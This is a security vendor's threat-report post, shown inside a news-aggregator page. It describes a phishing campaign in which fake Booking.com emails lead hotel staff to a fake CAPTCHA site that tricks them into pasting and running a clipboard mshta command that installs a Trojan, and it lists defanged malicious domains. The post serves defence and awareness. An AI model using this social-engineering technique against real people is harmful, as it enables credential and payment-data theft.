惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Last Week in AI
Last Week in AI
Project Zero
Project Zero
L
LINUX DO - 最新话题
C
Cisco Blogs
P
Privacy International News Feed
S
Schneier on Security
D
Darknet – Hacking Tools, Hacker News & Cyber Security
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
S
Security @ Cisco Blogs
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
H
Hacker News: Front Page
V
Vulnerabilities – Threatpost
W
WeLiveSecurity
Webroot Blog
Webroot Blog
K
Kaspersky official blog
Help Net Security
Help Net Security
博客园_首页
Security Archives - TechRepublic
Security Archives - TechRepublic
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
宝玉的分享
宝玉的分享
Martin Fowler
Martin Fowler
雷峰网
雷峰网
The Last Watchdog
The Last Watchdog
WordPress大学
WordPress大学
IT之家
IT之家
Hugging Face - Blog
Hugging Face - Blog
A
Arctic Wolf
I
Intezer
V
V2EX
博客园 - 【当耐特】
Latest news
Latest news
T
Tenable Blog
Google Online Security Blog
Google Online Security Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
爱范儿
爱范儿
Cyberwarzone
Cyberwarzone
量子位
G
GRAHAM CLULEY
T
Troy Hunt's Blog
博客园 - Franky
Simon Willison's Weblog
Simon Willison's Weblog
博客园 - 三生石上(FineUI控件)
TaoSecurity Blog
TaoSecurity Blog
月光博客
月光博客
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
V
Visual Studio Blog
Jina AI
Jina AI
T
The Exploit Database - CXSecurity.com
NISL@THU
NISL@THU
Scott Helme
Scott Helme

Threat Walkthroughs – ThreatDown by Malwarebytes

Phishers go “interplanetary” to get company login credentials “Enhanced Bonus” QR code phish steals Microsoft credentials USB worms: Still wriggling on to under-protected computers after all these years Analyzing a Mispadu Trojan’s attack chain How a clipboard hijacker delivers Lumma Stealer - ThreatDown by Malwarebytes Web shop spreads SocGolish malware and steals credit cards Clipboard hijacker tries to install a Trojan A visit to a print shop put a password stealer on a co-worker’s laptop Watch out! Mobidash Android adware spread through phishing and online links
Fake Booking.com emails target hotels
Pieter Arntz · 2025-04-02 · via Threat Walkthroughs – ThreatDown by Malwarebytes
Booking.com

A new phishing campaign is using a famous brand to compromise hotels.

A new phishing campaign is using the Booking.com brand to target hotels, using fake Captcha websites. The attack begins with cybercriminals sending a fake Booking.com email to the hotel’s email address, asking them to confirm a booking.

Fake booking.com confirmation email

If the hotel staff go to the URL in the email, they are greeted by a website with a fake CAPTCHA popup asking them to prove they are a human.

Robot or Human?

Behind the scenes, the website has loaded a malicious mshta command into the user’s clipboard.

When they tick the CAPTCHA checkbox, the target is asked to complete a set of “Verification Steps”.

set of instructions

What the instructions actually do is paste the contents of the clipboard into a Windows command prompt and run it, which runs the mshta command that fetches and runs a remote file, setting off an attack chain that ends with the hotel’s systems being infected with a Trojan.

A compromised hotel network is a significant prize for cybercriminals, potentially offering access to payment details and other personal data that can be abused or sold.

How ThreatDown can help you

Even staff who have been trained to check that email senders are valid and that to avoid links in emails will slip up from time to time, and a range of technologies can blunt the impact when they do.

IOCs

Domains used in this campaign:

  • vencys[.]com, appears in the email and redirects to the CAPTCHA site.
  • bokcentrpart[.]com, hosts the fake CAPTCHA site.
  • captpart[.]info, the site the malware is downloaded from.